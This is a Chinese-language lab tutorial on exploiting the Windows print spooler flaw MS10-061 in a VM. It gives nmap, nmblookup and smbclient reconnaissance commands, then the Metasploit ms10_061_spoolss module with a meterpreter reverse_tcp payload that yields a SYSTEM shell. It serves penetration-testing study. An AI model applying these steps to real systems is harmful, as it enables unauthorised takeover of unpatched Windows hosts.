注意事項：

• kail首次打開metasploit，會初始化數據，可能會有點慢，請耐心等待！
• 本文僅供學習漏洞滲透測試，不得用于其他非法用途，否則造成的任何后果自負！！！

1. Metasploit簡介

Metasploit是一款開源的安全漏洞檢測工具，可以幫助安全和IT專業人士識別安全性問題，驗證漏洞的緩解措施，并管理專家驅動的安全性進行評估，提供真正的安全風險情報。這些功能包括智能開發，代碼審計，Web應用程序掃描，社會工程。詳細介紹可以參考百度百科對 Mettasploit 的介紹。

2.打印后臺程序服務模擬漏洞(CVE-2010-2729/MS10-061)

利用MSF中的攻擊模塊：ms10_061_spoolss，Windows打印后臺程序沒有充分的限制訪問該服務的用戶權限，攻擊者可以通過提交特制的打印請求在Windows系統目錄（%SystemRoot%\system32）中創建文件。攻擊者可以指定任何文件名，包括目錄遍歷，通過WritePrinter請求，攻擊者可以完全控制創建文件的內容。將文件寫入到Windows系統目錄（%SystemRoot%\system32）后，通過WMI來部署惡意程序，因為系統會自動運行%SystemRoot%\System32\Wbem\MOF文件夾的mof文件、執行命令。
該漏洞首次被發現并被利用于著名的Stuxnet蠕蟲（俗稱“震網”）

3.實驗環境

VMware虛擬環境
攻擊機：Kali Linux；目標機：Windows xp sp2

4.實驗步驟

4.1 使用Nmap掃描目標機器是否存在NetBios和RPC服務
4.2 NetBios共享檢測
4.3 使用MSF的ms10_061_spoolss模塊攻擊目標機

5.設置目標機環境

獲取目標機IP

創建打印共享（默認是沒有打印共享）
1）代開控制面板，選擇打印機和其他硬件2）選擇打印機和傳真
3）添加打印機4）本地打印機，不勾選“自動檢測并安裝即插即用打印機”
5）選擇使用LPT1端口
隨便選一個打印機廠商和型號取個名字選擇共享打印機

6.在Kali上檢測打印機

1）nmap掃描

nmap -sS -sU -O -p127-139,445 192.168.230.137

• 1

2)查找NetBIOS

nmblookup -A 192.168.230.137

• 1

NetBIOS工作站名字：123-13DFCFEDD88
NetBIOS組名：WORKGROUP

7.訪問SMB資源

smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N

• 1

看到了打印共享

8.使用MSF模塊攻擊

1）載入模塊，搜索一下ms10_061
2)利用漏洞，并查看需要配置的參數

3）配置參數4）設置Payload

set payload windows/meterpreter/reverse_tcp

• 1

5）設置Payload參數6）攻擊攻擊完成后，建立了遠程會話，惡意程序寫入到目標機的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe,惡意程序是通過%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof控制運行的。
7）接下來可以執行一系列操作
getuid，getpid
可以看到我們獲取了系統的system權限

此時執行shell可以進入目標機的命令行界面
至此，整個攻擊過程已經大體結束，之后可以進行取證等一系列工作。最后感謝各位的閱讀，由于本人水平有限，如有不足，敬請諒解。

創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的Kali利用msf对MS10_061漏洞进行渗透测试的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。